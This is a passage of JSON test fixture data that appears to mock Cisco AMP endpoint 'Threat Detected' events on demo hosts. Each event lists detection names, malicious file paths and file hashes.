Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":913000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228942","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":913000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228941","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":897000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228940","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":211000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228939","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":117000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228938","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":753000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":733000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":324000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat 